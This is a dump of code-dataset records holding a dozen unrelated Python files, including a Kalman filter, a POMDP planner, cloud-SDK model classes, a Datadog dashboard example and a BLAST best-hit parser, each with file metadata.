hasattr(attr, '_coaster_annotations'):\n setattr(attr, '_coaster_annotations', [])\n attr._coaster_annotations.append(annotation)\n except AttributeError:\n pass\n return attr\n\n decorator.__name__ = decorator.name = annotation\n decorator.__doc__ = doc\n return decorator\n","sub_path":"coaster/sqlalchemy/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552681403","text":"# # # # # # # # # # # # # # # # # # # # # # # #\r\n# # \r\n# Module to run condition module #\r\n# By: David Alvarez #\r\n# 08-11-2020 #\r\n# Version Aplha-0. 1 # \r\n# #\r\n# # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\nfrom PywerAPM_Case_Setting import*\r\n\r\nfrom APM_Module import APM \r\nfrom Processing_tools import Report_APM_df, Report_APM_Meta_data, Report_ACM_Meta_data\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\n#results_path ='RESULTS/'\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n# Run criticality #\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\ndef run_criticality():\r\n import PywerACM_Main\r\n df = PywerACM_Main.run_ACM(N)\r\n store = pd.HDFStore(results_path+'Results_ACM.h5')\r\n store.put('df', df)\r\n store.get_storer('df').attrs['TITLE'] = 'ACM_Report'\r\n date = datetime.date(datetime.now())\r\n print(date)\r\n store.get_storer('df').attrs['Date'] = date\r\n store.close()\r\n\r\n\r\ndef load_criticality(cr_type='Monte_Carlo',assets=None): \r\n if cr_type == 'Monte_Carlo': # Load Montecarlo simulations\r\n store = pd.HDFStore(results_path+'Results_ACM.h5')\r\n df = store['df']\r\n store.close()\r\n else: # Fixed conditios\r\n df = assets.copy()\r\n df_type = {}\r\n df_group = assets.groupby(['Disc_Type'])\r\n for group in df_group: # Read criticality by type of asset \r\n name = group[0]\r\n df_type = pd.read_excel(cr_type, sheet_name=name,usecols = \"A:H\")\r\n for index, row in df_type.iterrows(): \r\n df.loc[(df.Disc_Type==name) & (df.Asset_To_Disconet==row.Asset),['Cr_Env','Cr_Sec','Cr_Leg']] = [row.ENVIRONMENTAL,row.SECURITY,row.LEGAL]\r\n # Total criticality\r\n df['T_Cr'] = df['Cr_Env']+df['Cr_Sec']+df['Cr_Leg']+df['Cr_Fin'] \r\n return df\r\n\r\n# Generate condition report\r\ndef Generate_Report_Risk(DF_ACP,DF_sum):\r\n from R1_Reports import Test_Report_AC\r\n Test_Report_AC(report_data,DF_ACP,DF_sum,years,N)\r\n","sub_path":"APM/BIN/ARM_Run.py","file_name":"ARM_Run.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620215529","text":"# -*- coding: utf8 -*-\n# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom tencentcloud.common.abstract_model import AbstractModel\n\n\nclass DataPoint(AbstractModel):\n \"\"\"监控数据点\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Dimensions: 实例对象维度组合\n :type Dimensions: list of Dimension\n :param Timestamps: 时间戳数组,表示那些时间点有数据,缺失的时间戳,没有数据点,可以理解为掉点了\n :type Timestamps: list of float\n :param Values: 监控值数组,该数组和Timestamps一一对应\n :type Values: list of float\n \"\"\"\n self.Dimensions = None\n self.Timestamps = None\n self.Values = None\n\n\n def _deserialize(self, params):\n if params.get(\"Dimensions\") is not None:\n self.Dimensions = []\n for item in params.get(\"Dimensions\"):\n obj = Dimension()\n obj._deserialize(item)\n self.Dimensions.append(obj)\n self.Timestamps = params.get(\"Timestamps\")\n self.Values = params.get(\"Values\")\n\n\nclass DescribeBaseMetricsRequest(AbstractModel):\n \"\"\"DescribeBaseMetrics请求参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Namespace: 业务命名空间\n :type Namespace: str\n :param MetricName: 指标名\n :type MetricName: str\n \"\"\"\n self.Namespace = None\n self.MetricName = None\n\n\n def _deserialize(self, params):\n self.Namespace = params.get(\"Namespace\")\n self.MetricName = params.get(\"MetricName\")\n\n\nclass DescribeBaseMetricsResponse(AbstractModel):\n \"\"\"DescribeBaseMetrics返回参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param MetricSet: 查询得到的指标描述列表\n :type MetricSet: list of MetricSet\n :param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。\n :type RequestId: str\n \"\"\"\n self.MetricSet = None\n self.RequestId = None\n\n\n def _deserialize(self, params):\n if params.get(\"MetricSet\") is not None:\n self.MetricSet = []\n for item in params.get(\"MetricSet\"):\n obj = MetricSet()\n obj._deserialize(item)\n self.MetricSet.append(obj)\n self.RequestId = params.get(\"RequestId\")\n\n\nclass Dimension(AbstractModel):\n \"\"\"实例对象的维度组合\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Name: 实例维度名称\n :type Name: str\n :param Value: 实例维度值\n :type Value: str\n \"\"\"\n self.Name = None\n self.Value = None\n\n\n def _deserialize(self, params):\n self.Name = params.get(\"Name\")\n self.Value = params.get(\"Value\")\n\n\nclass DimensionsDesc(AbstractModel):\n \"\"\"维度信息\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Dimensions: 维度名数组\n :type Dimensions: list of str\n \"\"\"\n self.Dimensions = None\n\n\n def _deserialize(self, params):\n self.Dimensions = params.get(\"Dimensions\")\n\n\nclass GetMonitorDataRequest(AbstractModel):\n \"\"\"GetMonitorData请求参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Namespace: 命名空间,每个云产品会有一个命名空间\n :type Namespace: str\n :param MetricName: 指标名称,各个云产品的详细指标说明请参阅各个产品[监控接口](https://cloud.tencent.com/document/product/248/30384)文档\n :type MetricName: str\n :param Instances: 实例对象的维度组合\n :type Instances: list of Instance\n :param Period: 监控统计周期。默认为取值为300,单位为s\n :type Period: int\n :param StartTime: 起始时间,如2018-09-22T19:51:23+08:00\n :type StartTime: str\n :param EndTime: 结束时间,默认为当前时间。 EndTime不能小于EtartTime\n :type EndTime: str\n \"\"\"\n self.Namespace = None\n self.MetricName = None\n self.Instances = None\n self.Period = None\n self.StartTime = None\n self.EndTime = None\n\n\n def _deserialize(self, params):\n self.Namespace = params.get(\"Namespace\")\n self.MetricName = params.get(\"MetricName\")\n if params.get(\"Instances\") is not None:\n self.Instances = []\n for item in params.get(\"Instances\"):\n obj = Instance()\n obj._deserialize(item)\n self.Instances.append(obj)\n self.Period = params.get(\"Period\")\n self.StartTime = params.get(\"StartTime\")\n self.EndTime = params.get(\"EndTime\")\n\n\nclass GetMonitorDataResponse(AbstractModel):\n \"\"\"GetMonitorData返回参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Period: 统计周期\n :type Period: int\n :param MetricName: 指标名\n :type MetricName: str\n :param DataPoints: 数据点数组\n :type DataPoints: list of DataPoint\n :param StartTime: 开始时间\n :type StartTime: str\n :param EndTime: 结束时间\n :type EndTime: str\n :param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。\n :type RequestId: str\n \"\"\"\n self.Period = None\n self.MetricName = None\n self.DataPoints = None\n self.StartTime = None\n self.EndTime = None\n self.RequestId = None\n\n\n def _deserialize(self, params):\n self.Period = params.get(\"Period\")\n self.MetricName = params.get(\"MetricName\")\n if params.get(\"DataPoints\") is not None:\n self.DataPoints = []\n for item in params.get(\"DataPoints\"):\n obj = DataPoint()\n obj._deserialize(item)\n self.DataPoints.append(obj)\n self.StartTime = params.get(\"StartTime\")\n self.EndTime = params.get(\"EndTime\")\n self.RequestId = params.get(\"RequestId\")\n\n\nclass Instance(AbstractModel):\n \"\"\"实例维度组合数组\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Dimensions: 实例的维度组合\n :type Dimensions: list of Dimension\n \"\"\"\n self.Dimensions = None\n\n\n def _deserialize(self, params):\n if params.get(\"Dimensions\") is not None:\n self.Dimensions = []\n for item in params.get(\"Dimensions\"):\n obj = Dimension()\n obj._deserialize(item)\n self.Dimensions.append(obj)\n\n\nclass MetricObjectMeaning(AbstractModel):\n \"\"\"指标数据的解释\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param En: 指标英文解释\n :type En: str\n :param Zh: 指标中文解释\n :type Zh: str\n \"\"\"\n self.En = None\n self.Zh = None\n\n\n def _deserialize(self, params):\n self.En = params.get(\"En\")\n self.Zh = params.get(\"Zh\")\n\n\nclass MetricSet(AbstractModel):\n \"\"\"对业务指标的单位及支持统计周期的描述\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Namespace: 命名空间,每个云产品会有一个命名空间\n :type Namespace: str\n :param MetricName: 指标名称\n :type MetricName: str\n :param Unit: 指标使用的单位\n :type Unit: str\n :param UnitCname: 指标使用的单位\n :type UnitCname: str\n :param Period: 指标支持的统计周期,单位是秒,如60、300\n :type Period: list of int\n :param Periods: 统计周期内指标方式\n :type Periods: list of PeriodsSt\n :param Meaning: 统计指标含义解释\n :type Meaning: :class:`tencentcloud.monitor.v20180724.models.MetricObjectMeaning`\n :param Dimensions: 维度描述信息\n :type Dimensions: list of DimensionsDesc\n \"\"\"\n self.Namespace = None\n self.MetricName = None\n self.Unit = None\n self.UnitCname = None\n self.Period = None\n self.Periods = None\n self.Meaning = None\n self.Dimensions = None\n\n\n def _deserialize(self, params):\n self.Namespace = params.get(\"Namespace\")\n self.MetricName = params.get(\"MetricName\")\n self.Unit = params.get(\"Unit\")\n self.UnitCname = params.get(\"UnitCname\")\n self.Period = params.get(\"Period\")\n if params.get(\"Periods\") is not None:\n self.Periods = []\n for item in params.get(\"Periods\"):\n obj = PeriodsSt()\n obj._deserialize(item)\n self.Periods.append(obj)\n if params.get(\"Meaning\") is not None:\n self.Meaning = MetricObjectMeaning()\n self.Meaning._deserialize(params.get(\"Meaning\"))\n if params.get(\"Dimensions\") is not None:\n self.Dimensions = []\n for item in params.get(\"Dimensions\"):\n obj = DimensionsDesc()\n obj._deserialize(item)\n self.Dimensions.append(obj)\n\n\nclass PeriodsSt(AbstractModel):\n \"\"\"周期内的统计方式\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Period: 周期\n :type Period: str\n :param StatType: 统计方式\n :type StatType: list of str\n \"\"\"\n self.Period = None\n self.StatType = None\n\n\n def _deserialize(self, params):\n self.Period = params.get(\"Period\")\n self.StatType = params.get(\"StatType\")","sub_path":"tencentcloud/monitor/v20180724/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342197793","text":"\"\"\"\nCreate a new dashboard with manage_status widget\n\"\"\"\n\nfrom datadog_api_client import ApiClient, Configuration\nfrom datadog_api_client.v1.api.dashboards_api import DashboardsApi\nfrom datadog_api_client.v1.model.dashboard import Dashboard\nfrom datadog_api_client.v1.model.dashboard_layout_type import DashboardLayoutType\nfrom datadog_api_client.v1.model.monitor_summary_widget_definition import MonitorSummaryWidgetDefinition\nfrom datadog_api_client.v1.model.monitor_summary_widget_definition_type import MonitorSummaryWidgetDefinitionType\nfrom datadog_api_client.v1.model.widget import Widget\nfrom datadog_api_client.v1.model.widget_color_preference import WidgetColorPreference\nfrom datadog_api_client.v1.model.widget_layout import WidgetLayout\nfrom datadog_api_client.v1.model.widget_monitor_summary_display_format import WidgetMonitorSummaryDisplayFormat\nfrom datadog_api_client.v1.model.widget_monitor_summary_sort import WidgetMonitorSummarySort\nfrom datadog_api_client.v1.model.widget_summary_type import WidgetSummaryType\n\nbody = Dashboard(\n title=\"Example-Dashboard\",\n description=\"\",\n widgets=[\n Widget(\n layout=WidgetLayout(\n x=0,\n y=0,\n width=50,\n height=25,\n ),\n definition=MonitorSummaryWidgetDefinition(\n type=MonitorSummaryWidgetDefinitionType.MANAGE_STATUS,\n summary_type=WidgetSummaryType.MONITORS,\n display_format=WidgetMonitorSummaryDisplayFormat.COUNTS_AND_LIST,\n color_preference=WidgetColorPreference.TEXT,\n hide_zero_counts=True,\n show_last_triggered=False,\n query=\"\",\n sort=WidgetMonitorSummarySort.STATUS_ASCENDING,\n count=50,\n start=0,\n ),\n ),\n ],\n template_variables=[],\n layout_type=DashboardLayoutType.FREE,\n is_read_only=False,\n notify_list=[],\n)\n\nconfiguration = Configuration()\nwith ApiClient(configuration) as api_client:\n api_instance = DashboardsApi(api_client)\n response = api_instance.create_dashboard(body=body)\n\n print(response)\n","sub_path":"examples/v1/dashboards/CreateDashboard_2917274132.py","file_name":"CreateDashboard_2917274132.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155804561","text":"from typing import List\n\nclass Solution:\n #时间复杂度 O(N) : 其中 N 为列表 pushed 的长度;每个元素最多入栈与出栈一次,即最多共 2N 次出入栈操作。\n #空间复杂度 O(N) : 辅助栈 stack 最多同时存储 NN 个元素。\n\n def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:\n stack, i = [], 0 #stack辅助栈\n for num in pushed:\n stack.append(num) # num 入栈\n while stack and stack[-1] == popped[i]: # 如果栈顶一样 循环判断与出栈\n stack.pop()\n i += 1 #把i +1,指向下一个popped的值\n return not stack\n\n","sub_path":"Offer/Offer31-validateStackSequences.py","file_name":"Offer31-validateStackSequences.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407812493","text":"import rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist\n\n\nclass KalmanFilter():\n def __init__(self, position, velocity):\n self.step_time = 0.1\n self.X0 = self.get_numpy_state(position, velocity)\n self.P0 = 0.001 * np.eye(4) # Ne znam kako izgleda pocetna matrica\n self.Q = 0.1 * np.eye(4)\n self.R = 0.001 * np.eye(2)\n\n T = self.step_time\n self.A = np.array([[1, 0, T, 0], [0, 1, 0, T], [0, 0, 1, 0], [0, 0, 0, 1]])\n self.B = np.array([[]])\n self.H = np.array([[1, 0, 0, 0], [0, 1, 0, 0]])\n\n self.X_old = self.X0\n self.P_old = self.P0\n\n def get_numpy_state(self, position, velocity=Twist()):\n \"\"\"Convert from some type (here: ROS msg) to numpy array.\"\"\"\n x = position.position.x\n y = position.position.y\n vx = velocity.linear.x\n vy = velocity.linear.y\n state = np.array([[x, y, vx, vy]])\n return state.T\n\n def get_used_state(self, np_state):\n \"\"\"Convert from numpy array to type used elswhere (here: ROS msg).\"\"\"\n time = rospy.Time.now()\n msg = Odometry()\n msg.header.stamp = time\n msg.pose.pose.position.x = np_state[0][0]\n msg.pose.pose.position.y = np_state[1][0]\n msg.twist.twist.linear.x = np_state[2][0]\n msg.twist.twist.linear.y = np_state[3][0]\n return msg\n\n def predict(self, u):\n \"\"\"\n Args:\n u: input vector\n \"\"\"\n X_est = np.dot(self.A, self.X_old)\n P_est = np.dot(np.dot(self.A, self.P_old), self.A.T) + self.Q\n\n self.X_old = X_est\n self.P_old = P_est\n\n return X_est, P_est\n\n def update(self, X_est, P_est, Xm):\n \"\"\"\n Args:\n Xm: measured state\n X_est: estimated state from prediction step\n P_est: estimated covariance matrix from prediction step\n \"\"\"\n Xm = self.get_numpy_state(Xm)\n K = np.dot(np.dot(P_est, self.H.T), np.linalg.inv(np.dot(np.dot(self.H, P_est), self.H.T) + self.R))\n Y = np.dot(self.H, Xm)\n X_new = X_est + np.dot(K, (Y - np.dot(self.H, X_est)))\n P_new = np.eye(4) - np.dot(np.dot(K, self.H), P_est)\n\n self.X_old = X_new\n self.P_old = P_new\n\n return self.get_used_state(X_new)\n","sub_path":"scripts/kalman.py","file_name":"kalman.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394679148","text":"import socket\nimport sys\n\n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect the socket to the port where the server is listening\nserver_address = ('localhost', 10000)\nprint(sys.stderr, 'connecting to %s port %s' % server_address)\nsock.connect(server_address)\n\n# After the connection is established, data can be sent through the socket with sendall() and received with recv(), just as in the server.\n\ntry:\n # Send data\n # message = input()\n line = \"\"\"a = input('a=')\nprint(a)\"\"\"\n message = exec(line)\n\n # message = 'This is the message. It will be repeated.'\n print(sys.stderr, 'sending {}'.format(message))\n sock.sendall(message.encode('utf-8'))\n\n # Look for the response\n amount_received = 0\n amount_expected = len(message)\n\n while amount_received < amount_expected:\n data = sock.recv(1024)\n amount_received += len(data)\n print(sys.stderr, 'received {}'.format(data))\nfinally:\n print(sys.stderr, 'closing socket')\n sock.close()\n","sub_path":"Socket Programming/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407828869","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# State 0 is facing towards the lava, State 1 is facing away from the lava.\n# Control actions are moving forward, moving backward (which are absorbing states) and turning around\n\ncontrol_action_rewards = np.array(\n [[-100,100,-1],\n [100,-50,-1]]).T\n\nmeasurement_probabilities = np.array(\n [[0.7, 0.3],\n [0.3, 0.7]]\n)\npx1_u_x2 = np.array(\n [[[0, 0], [0, 0]],\n [[0, 0], [0, 0]],\n [[0.8, 0.2],[0.2, 0.8]]]\n)\n\n# Line set for each control action\ndef calculate_policy(T, gamma):\n # Initial line set\n line_set = [[0,0]]\n for tau in range(T):\n print(tau)\n all_new_lines = []\n policy = {}\n v_kuzj = np.zeros((len(line_set),3,2,2))\n # Cycle through each line\n for k, line in enumerate(line_set):\n # Cycle through each control action\n for u in range(3):\n # Cycle through each measurement\n for z in range(2):\n # Cycle through each state\n for j in range(2):\n for i in range(2):\n vik = line[i]\n pz_xi = measurement_probabilities[z][i]\n pxi_u_xj = px1_u_x2[u][j][i]\n v_kuzj[k][u][z][j] += vik*pz_xi*pxi_u_xj\n for u in range(3):\n for k1, line1 in enumerate(line_set):\n for k2, line2 in enumerate(line_set):\n v = [0,0]\n for i in range(2):\n v[i] = gamma*(control_action_rewards[u][i] + v_kuzj[k1][u][0][i] + v_kuzj[k2][u][1][i])\n if abs(v[0]) == 100*gamma:\n policy[(v[0], v[1])] = u\n else:\n policy[(v[1], v[0])] = u\n all_new_lines.append(v)\n line_set = np.copy(all_new_lines)\n if tau==0:\n pruned_lines = line_set\n else:\n not_initial = np.argwhere(abs(line_set[:,0]) != gamma*100)\n line_set[not_initial] = np.flip(np.squeeze(line_set[not_initial]), axis=1)[:,None,:]\n # Prune the lines\n # Check for duplicates\n line_dict = {}\n next_lines = []\n for line_first in line_set:\n skip_line = False\n for check_line in next_lines:\n if np.allclose(line_first, check_line):\n skip_line = True\n break\n if skip_line:\n continue\n next_lines.append(line_first) \n # Keep dominant lines\n to_examine = next_lines[np.argmax(np.array(next_lines)[:,0])]\n pruned_lines = np.array([to_examine])\n start_x = 0\n finished = False\n remaining_linear_constraints = np.delete(next_lines, 1, axis=0)\n while not finished:\n # Check minimum intersecting lines\n m1 = np.repeat(to_examine[1]-to_examine[0], len(remaining_linear_constraints))\n b1 = np.repeat(to_examine[0], len(remaining_linear_constraints))\n m2 = remaining_linear_constraints[:,1] - remaining_linear_constraints[:,0]\n b2 = remaining_linear_constraints[:,0]\n delete_indices = np.where(np.isclose(m2-m1, 0))\n m1 = np.delete(m1, delete_indices, axis=0)\n b1 = np.delete(b1, delete_indices, axis=0)\n m2 = np.delete(m2, delete_indices, axis=0)\n b2 = np.delete(b2, delete_indices, axis=0)\n remaining_linear_constraints = np.delete(remaining_linear_constraints, delete_indices, axis=0)\n if len(remaining_linear_constraints) == 0:\n break\n x = (b1-b2)/(m2-m1)\n delete_indices_2 = np.where(x < start_x)\n x = np.delete(x, delete_indices_2)\n remaining_linear_constraints = np.delete(remaining_linear_constraints, delete_indices_2, axis=0)\n if len(remaining_linear_constraints) == 0:\n break\n\n mins = np.argmin(x)\n candidates = remaining_linear_constraints[mins].reshape(-1,2)\n pruned_lines = np.concatenate((pruned_lines, candidates), axis=0)\n remaining_linear_constraints = np.delete(remaining_linear_constraints, mins, axis=0)\n to_examine = np.copy(candidates)[0]\n start_x = x[mins] \n line_set = np.copy(pruned_lines)\n for constraint in line_set:\n plt.plot([0,1], constraint)\n print(line_set)\n return policy, line_set\n\n\n\ndef take_measurement(actual_state):\n prob = np.random.random()\n if prob > 0.7:\n return int(not actual_state)\n else:\n return actual_state\n\ndef update_belief_after_measurement(p1, measured):\n if measured == 1:\n return (p1*0.7)/(0.4*p1+0.3)\n else: \n return (p1*0.3)/(-0.4*p1+0.7)\n\ndef update_belief_after_state_change(p1):\n return (-0.6*p1 + 0.8)\n\ndef take_step_u3(actual_state):\n prob = np.random.random()\n if prob > 0.8:\n return actual_state\n else:\n return int(not actual_state)\n\ndef simulate(steps, p1, actual_state, line_set, policy):\n reward = 0\n m = line_set[:,1] - line_set[:,0]\n b = line_set[:,0]\n for i in range(steps):\n measurement = take_measurement(actual_state)\n p1 = update_belief_after_measurement(p1, measurement)\n p0 = p1\n policy_line = line_set[np.argmax(m*p1 + b)]\n action_to_take = policy[(policy_line[0], policy_line[1])]\n reward += control_action_rewards[action_to_take][actual_state]\n if action_to_take == 0 or action_to_take == 1:\n break\n else: \n prev_state = actual_state\n actual_state = take_step_u3(actual_state)\n p1 = update_belief_after_state_change(p1)\n print(\"Step: {}, x_prev: {}, z: {}, p_after_measure: {}, x_after: {}, p_after_state_transition: {}\".format(i, prev_state, measurement, p0, actual_state, p1))\n print(\"Step: {}, measurement: {}, Final p1: {} Final Reward: {}\".format(i, measurement, p1, reward))\n\nif __name__ == \"__main__\":\n T=20\n gamma = 1.0\n policy, line_set = calculate_policy(T, gamma)\n plt.show()\n for i in range(10):\n simulate(T, 0.6, 1.0, line_set, policy)","sub_path":"pomdp_planning/pomdp.py","file_name":"pomdp.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122007794","text":"\nimport time,re\n# current_time=time.localtime()\n# #print(current_time)\n# current_clock_time=time.strftime(\"%y/%m/%d-%H:%M:%S\")\n# print(current_clock_time)\nName=input(\"enter\")\nprice=input(\"enter\")\ndef valid_product(Name,price):\n val1=re.match(\"([a-z]+)([a-z]+)([a-z]+)$\",Name)\n val2=re.match(\"[0-9]{0,7}$\",price)\n if val1 and val2:\n return True\n else:\n return False\nprint(valid_product(Name,price))\n","sub_path":"day11/tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159981923","text":"## Script (Python) \"guard_cancelled_object\"\n##bind container=container\n##bind context=context\n##bind namespace=\n##bind script=script\n##bind subpath=traverse_subpath\n##parameters=\n##title=\n##\n\nwf_tool = context.portal_workflow\n\n# Can't do anything to the object if it's cancelled\nif wf_tool.getInfoFor(context, 'cancellation_state') == \"cancelled\":\n return False\n\nreturn True\n\n","sub_path":"bika/lims/skins/bika/guard_cancelled_object.py","file_name":"guard_cancelled_object.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361105412","text":"#!/usr/bin/python3\n\nimport pandas as pd\nimport numpy as np\nimport requests, sys\nfrom itertools import combinations\n#import seaborn as sns\nfrom scipy import stats\nimport pickle\nfrom collections import Counter\nimport copy\nfrom scipy.stats import sem, t\nfrom scipy import mean\nimport re\nimport os\nimport gzip\nimport fileinput\n\n\n\"\"\"\nHere we create the function for checking the input parameters and saving\nthem in different variables, error if the usage is not good\n\"\"\"\n\nif len(sys.argv) == 4:\n tags_file = sys.argv[1]\n ref_species = sys.argv[2]\n out_file = sys.argv[3]\nelse:\n sys.exit(\"The usage shoud be: ./FinderSBH.py in_file tag_file output_file\")\n\n#VARIABLES\n#!/usr/bin/env python3\n\n#VARIABLES\nquery_species = \"\"\nSBH_dict = {}\nspecies_counter = {}\ncluster_dict = {}\n\n\"\"\"\nRead TAGs file foreach primate species used in the analysis\nand store it in a Pandas DataFrame\n\"\"\"\n\nSpecies_tags = pd.read_csv(tags_file, sep='\\t', low_memory=False)#panda creation\ncolnames = ['Target{}'.format(num) for num in range(1, len(Species_tags))]\nfinalnames = ['Query'] + colnames\nSBH_df = pd.DataFrame(columns=finalnames)\n\n\n\"\"\"\nFUNCTIONS\n\"\"\"\n\n\"\"\"\nStore in a dictionary all target species so as to keep a counter\nfor unique species as best hits\n\"\"\"\n\ndef store_target_species_count_in_dict(Species_df, reference):\n target_species = Species_df['Species'].to_list()\n print(reference)\n target_species.remove(reference)\n species_counter = {name:0 for name in target_species}\n return species_counter\n\n\n\"\"\"\nHere, we create a function that parses the clusters of sequences to retrieve all\nIDs from the cluster appart from the representative one\n\"\"\"\n\ndef parse_cluster_file(clusters_file, clusters_dict):\n with open(clusters_file, \"rt\") as in_fh:\n id = \"\"\n clustered = []\n for line in in_fh:\n line = line.rstrip()\n if line.startswith(\">\") and not id:\n continue\n elif line.startswith(\">\"):\n clusters_dict[representative] = clustered\n id = \"\"\n clustered = []\n else:\n id = line.split(\">\")[1].split(\".\")[0]\n if line[-1] == \"*\":\n representative = id\n else:\n clustered.append(id)\n clusters_dict[representative] = clustered\n return clusters_dict\n\n\n\"\"\"\nAnother function here helps us to identify extra species by looking whether the\nID of the species match any of the clusters, and retrieves all the other\ntarget IDs associated\n\"\"\"\n\n\ndef check_all_species_in_cluster(ident, query, clusters_dict, best_hit_dict,\nsp_counter):\n sp_counter, best_hit_dict = include_only_best_hit_foreach_species_target(ident,\n best_hit_dict, query, sp_counter)\n if ident in clusters_dict:\n for value in clusters_dict[ident]:\n sp_counter, best_hit_dict = include_only_best_hit_foreach_species_target(value,\n best_hit_dict, query, sp_counter)\n return sp_counter, best_hit_dict\n\n\n\"\"\"\nHere, the function includes only a species once, as the best hit for our reference\nspecies. Then, with that in mind, filters for species appearing more than once\nas hits for a specific query entry\n\"\"\"\n\n#FUNCTION TO INCLUDE ONLY A SPECIES ONCE (BEST HIT)\ndef include_only_best_hit_foreach_species_target(elem, best_hit_dict, query,\nsp_counter):\n for item in Species_tags['Tag']:\n if elem.startswith(item):\n current_species = Species_tags.loc[Species_tags['Tag'] == item].Species.item()\n if current_species in sp_counter:\n if sp_counter[current_species] == 0:\n sp_counter[current_species] += 1\n best_hit_dict[query].append(elem)\n return sp_counter, best_hit_dict\n\n\n\"\"\"\nLast function to print the ouput in Pandas format for the Query and\nTarget columns in our dataframe\n\"\"\"\n\n#FUNCTION TO INCLUDE ONLY A SPECIES ONCE (BEST HIT)\ndef append_out_BBHs_pandas_format(sbh_dict, sbh_df, query):\n query_row = [query] + sbh_dict[query] + \\\n list(np.repeat(np.nan, len(sbh_df.columns)-len(sbh_dict[query])-1))\n sbh_df = sbh_df.append(pd.Series(query_row, index=sbh_df.columns),\n ignore_index=True)\n return sbh_df\n\n\n\n\"\"\"\nMAIN\n\"\"\"\n\nspecies_counter = store_target_species_count_in_dict(Species_tags, ref_species)\n\n#cluster_dict = parse_cluster_file(clust_file, cluster_dict)\n\ncount = 0\nin_fh = iter(sys.stdin)\nfor line in in_fh:\n line = line.rstrip()\n if line.startswith(\"Query=\") and query_species == \"\":\n query_fields = line[7:].split(\" \")\n query_species = \"_\".join(query_fields[0:1])\n SBH_dict[query_species] = []\n elif line.startswith(\"Query=\"):\n SBH_df = append_out_BBHs_pandas_format(SBH_dict, SBH_df,\n query_species)\n query_fields = line[7:].split(\" \")\n query_species = \"_\".join(query_fields[0:1])\n SBH_dict[query_species] = []\n species_counter = {k:0 for k in species_counter}\n elif line.startswith(\"Sequences producing significant alignments\"):\n next(in_fh)\n line_new = next(in_fh).rstrip()\n while (any(letter.isalnum() for letter in line_new)):\n ID_fields = line_new.split(\" \")\n ID = \"_\".join(ID_fields[2:3])\n species_counter, SBH_dict = include_only_best_hit_foreach_species_target(ID, SBH_dict,\n query_species, species_counter)\n line_new = next(in_fh).rstrip()\n\n#REPEAT THIS AFTER LOOP`FOR LAST HOMOLOG ENTRY\nSBH_df = append_out_BBHs_pandas_format(SBH_dict, SBH_df,\nquery_species)\n#Print_SBHs_in_Pandas_format(SBH_dict, SBH_df, out_file)\nSBH_df.to_csv(out_file, sep = \"\\t\", index=False)\n","sub_path":"Orthologies_human_driven_refs/BlastP/BBHs/FinderSBH.py","file_name":"FinderSBH.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491461380","text":"###Edit by Hanlin Gu on 1/9/2020\n###obtain population of different conformations, 'result$.txt' is the revised version of '2nd_stage_brute_force_classification_result.dat', removed:@\n###2nd_stage_brute_force_classification_result.dat has 8 columns, the 1st column is the number, 2nd-7th columns are distance of three conformations in two range(so is 6)\n### 8th column is the minmum distance of 2nd-7th distance, 9th column is the conformation number which will assign. \n###Actually here we have three conformations in two range, so is 